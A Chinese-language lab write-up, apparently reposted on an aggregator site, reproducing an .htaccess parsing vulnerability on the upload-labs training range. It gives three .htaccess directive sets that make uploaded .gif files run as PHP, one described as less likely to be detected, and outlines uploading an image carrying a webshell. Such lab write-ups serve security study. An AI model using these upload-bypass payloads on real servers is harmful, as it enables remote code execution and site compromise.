漏洞复现篇——.htaccess文件解析漏洞

漏洞复现篇——.htaccess文件解析漏洞,第1张

概述声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归【爱国小白帽】所有实验环境:PHPstudyphp5.6以下不带nts的版本upload-labs-master上传漏洞靶场服务器没有禁止.h

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归【爱国小白帽】所有

实验环境:PHPstudyPHP5.6以下不带nts的版本upload-labs-master上传漏洞靶场服务器没有禁止.htaccess文件的上传,且服务商允许用户使用自定义.htaccess文件

原理:.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverrIDe指令来设置。

.htaccess文件内容

.htaccess文件解析规则的增加,是可以按照组合的方式去做的,不过具体得自己多测试。

第一种、虽然好用,但是会误伤其他正常文件,容易被发现
<IfModule mime_module>AddHandler PHP5-script .gif          #在当前目录下,只针对gif文件会解析成PHP代码执行SetHandler application/x-httpd-PHP    #在当前目录下,所有文件都会被解析成PHP代码执行</IfModule>
第二种、精确控制能被解析成PHP代码的文件,不容易被发现
<filesMatch "evil.gif">SetHandler application/x-httpd-PHP   #在当前目录下,如果匹配到evil.gif文件,则被解析成PHP代码执行AddHandler PHP5-script .gif          #在当前目录下,如果匹配到evil.gif文件,则被解析成PHP代码执行</filesMatch>
第三种、同1没太大区别
<IfModule mime_module>AddType application/x-httpd-PHP .gif</IfModule>

利用方式:上传覆盖.htaccess文件,重写解析规则,将上传的带有脚本马的图片以脚本方式解析。

实验1、选择upload-labs-master的第四关上传写好的.htaccess文件,这里我用的第二种方法,内容如下:
<filesMatch "1.gif">SetHandler application/x-httpd-PHP   AddHandler PHP5-script .gif         </filesMatch>

2、然后再上传写好的1.gif文件

3、复制图片地址,打開新的网页成功显示



欢迎关注公众号,原创不易,转载请注明来源【爱国小白帽】????

总结

以上是内存溢出为你收集整理的漏洞复现篇——.htaccess文件解析漏洞全部内容,希望文章能够帮你解决漏洞复现篇——.htaccess文件解析漏洞所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/1000517.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-21
下一篇 2022-05-21

发表评论

登录后才能评论

评论列表(0条)

保存